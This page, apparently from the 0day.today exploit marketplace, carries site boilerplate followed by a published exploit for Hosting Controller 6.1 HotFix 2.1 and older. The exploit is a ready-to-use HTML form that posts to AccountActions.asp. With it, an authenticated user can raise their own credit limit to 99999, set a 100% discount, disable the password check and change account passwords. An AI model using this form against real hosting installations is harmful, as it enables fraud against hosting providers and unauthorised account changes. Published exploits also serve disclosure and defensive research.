0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit
================================================================== Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit ================================================================== Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group). Title: Hosting controller program have a security bug in "AccountActions.asp" that an authenticated user can change his/her credit and buy some services! Version: 6.1 HotFix 2.1 and older Developer url: hostingcontroller.com Comment: Hosting Controller is an application to manage a host. Exploit code to proof: -------------------------------- GET CREDIT<br>Soroush Dalili from GSG<br> <form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post"> <table> <tr> <td>Username:</td> <td><input type="text" name="UserName" value=""></td> </tr> <tr> <td>Description:</td> <td><input type="text" name="Description" value=""></td> </tr> <tr> <td>FullName:</td> <td><input type="text" name="FullName" value=""></td> </tr> <tr> <td>AccountDisabled 1,[blank]:</td> <td><input type="text" name="AccountDisabled" value=""></td> </tr> <tr> <td>UserChangePassword:</td> <td><input type="text" name="UserChangePassword" value=""></td> </tr> <tr> <td>PassCheck=TRUE,0:</td> <td><input type="text" name="PassCheck" value="0"></td> </tr> <tr> <td>New Password:</td> <td><input type="text" name="Pass1" value=""></td> </tr> <tr> <td>DefaultDiscount%:</td> <td><input type="text" name="DefaultDiscount" value="100"></td> </tr> <tr> <td>CreditLimit:</td> <td><input type="text" name="CreditLimit" value="99999"></td> </tr> </table> <br><input type="submit"> </form> <hr><br> # 0day.today [2024-11-15] #